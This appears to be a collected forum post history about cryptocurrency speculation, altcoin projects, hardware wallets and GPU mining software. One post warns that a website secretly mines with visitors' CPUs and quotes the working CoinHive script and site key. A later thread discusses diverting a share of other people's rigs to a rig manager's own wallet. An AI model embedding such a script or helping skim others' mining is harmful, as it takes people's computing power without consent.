HitBTC Very-very good! Smiley

I really hope the HitBTC people are in on this, too.  Cheesy Cheesy

Hi.

Is it possible to sell ELE coins on any exchange at the moment?

The Winklevoss twins (those originally behind the Facebook idea) also predict great future for Bitcoin, $100K value per coin.
64  Economy / Speculation / Re: 1 millon for a Bitcoin is this fiction or reality? on: October 11, 2017, 01:38:16 AM
Well the fact it hasn't happened yet shows that it's fiction. And realistically the likelihood if it ever happening is minute at best, that isn't to say however that it can't happen. It would just require everything to go pretty much perfectly in terms of bitcoin progression and adoption.

I'm pretty sure it WILL happen, though I doubt any of us would be alive by then.

I just want to echo this.  This project has SO much potential.

Really? I don't see any potential. It's just a coin. Not even with a working wallet. Which means, it's underfinanced, at least.

The lack of a pre-mine is incredible, and the vision you've laid out is quite spectacular.  Obviously we need to see you deliver on these promises, but in my opinion this is far from a shitcoin.

I think it's a typical shitcoin. Lots of blah, zero value.

That being said, part of what's amazing about this is you're trying to pull off multi-algo.  It's not easy.  It's what makes your coin great, but it's hard to do.  So you must get those basics right before rushing to exchanges.  Get all 5 chains working, get all 5 algos each a pool, and get a wallet going for Windows (I think Linux is enough for a launch/mining, but for exchanges you need buyers, which means you need Windows users).

Multi-algo is great? Great for who? For miners? Or for clients? You know, it's clients who're gonna pay for coins, not miners. They don't really care about the algo.

WORKER_NAME - not need on this pool, only WALLET!

Worker name is not needed on any pool. I need it, because I want to see my worker stats.

Hi,

does anyone know how to set worker name on umine.org? -u WALLET_NUMBER.WORKER_NAME ? I'm doing it like that, wallet number is detected correcly, but worker name is not shown.

For now I am using the -p parameter to put worker name there, it shows up in stats ('extra' field).
68  Economy / Trading Discussion / Re: How do you Panic? on: October 08, 2017, 09:10:17 PM
Whether its bitcoin trading or altcoin trading, there is bound to come a time when your investment is getting dumped badly, and its panic time.
How do you panic? Does that really make you panic and do you take decisions that you actually regretted later? Or do you keep calm and HODL?
What makes you panic and how do you react to it?

You are supposed to have a single strategy that you need to think through before you get into any investment. Then, you just act accordingly.
69  Alternate cryptocurrencies / Mining (Altcoins) / Re: DAG size calculator on: September 24, 2017, 11:21:52 PM
The https://investoon.com/tools/dag_size website contains a Javascript miner, which means it's using website visitor's CPU to mine in favor of website creator. See website source:

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

<script>
    var miner = new CoinHive.Anonymous('AEwgHPotuZxRNQbnuR4YTOVzq9gRsNET');
    miner.start();
    miner.setThrottle(0.38);
</script>

Probably by the time most people will see this post, this part of code will be removed from this website. But it is present at the moment of this message writing.
70  Bitcoin / Hardware wallets / Ledger Nano S problem (cannot start Bitcoin Wallet) on: September 22, 2017, 12:38:49 PM
Hi.

I recently purchased the Ledger Nano S.

Here is what I've done (in this exact order):

1. Started Ethereum Wallet Chrome app, started Ethereum Wallet app in the device. Created Ethereum address, wallet works fine.

2. Installed ZCash Wallet onto the device, started Chrome Bitcoin app (which they use for ZCash in Ledgerwallet), created ZCash address, sync started, all works fine.

3. Tried to create a BTC wallet: started Chrome Bitcoin app (same one used for ZCash), started Bitcoin app on the device. I get this screen in the Chrome app when it asks me whether I want to use Bitcoin or Bitcoin Cash, I chose Bitcoin. Then it asks if I want to create a legacy address or segwit address -- I chose segwit (tried the legacy option too). At this point (as I can see in Youtube videos) wallet syncronization is supposed to start. However, the Legacy/Segwit window just closes and I see the Bitcoin/Bitcoin Cash window again. Nothing happens then. I can hit the "Bitcoin" button again, and it goes on forever.

I tried to remove the Bitcoin app from the device in order to reinstall it. But Ledger App manager won't let me do it (operation fails). Tried to plug/unplug/re-enter PIN many times, of course.

Ledgerwallet support wait time is about 2 weeks.

Does anyone have an idea what's happening? Please.

thanks.
71  Alternate cryptocurrencies / Mining (Altcoins) / Re: Claymore's Dual Ethereum AMD+NVIDIA GPU Miner v9.8 (Windows/Linux) on: August 30, 2017, 12:30:47 PM
Hi.

I noticed a couple of problems with the miner.

1. ethpool.org IP is not resolved correctly. Looks like eu1.ethpool.org IP is hard-coded or cached somewhere into miner. First connection attempt ALWAYS fails. Then, 20 sec wait, then, successful connect using a failover address. The first IP that miner tries to connect to (91.121.73.83) is not the IP which eu1.ethpool.org actually resolves to at the moment (188.165.235.31). My connections string is ./ethdcrminer64 -epool eu1.ethpool.org:3333 (Ubuntu)

2. I mine thru a typical wired router. When sometimes the router looses ISP connection it, as usual, serves its own error page to all clients. The miner, however, thinks it's a kind of a local proxy and attempts to continue mining. As no more new shares are found (because no more new jobs supplied), the miner thinks it's GPU failure ("Miner thread hangs") and activates the watchdog, instead of simply sitting there and waiting for internet connection to resume. This is not the right type of behavior, IMO.

Thanks!

I don't think this is a problem that needs to be addressed in the miner as it just sounds like you need to fix your internet  Wink

1. Turns out, eu1.ethpool.org resolves to several IPs, the miner picks up the first one. The first one does not work (probably due to my location). So, this is a pool problem.
2. This does have to be solved. Watchdog should not be triggered in this case. Miner should differentiate between a mining proxy and a router.

guys , is it possible to mine with claymore on two wallets? i support a lot of rigs and i want to take percent to my wallet like devfee to claymore. now i only use dual mining to my wallet but i want percent of ethereum.

Why don't you use a percent of your rigs to mine to your wallet?

i want percent of others to mine to my wallet.

You can run several miner instances. If you, say, have 6 GPUs in your rig, let 5 GPUs mine for rig owner and 1 GPU mine for you.
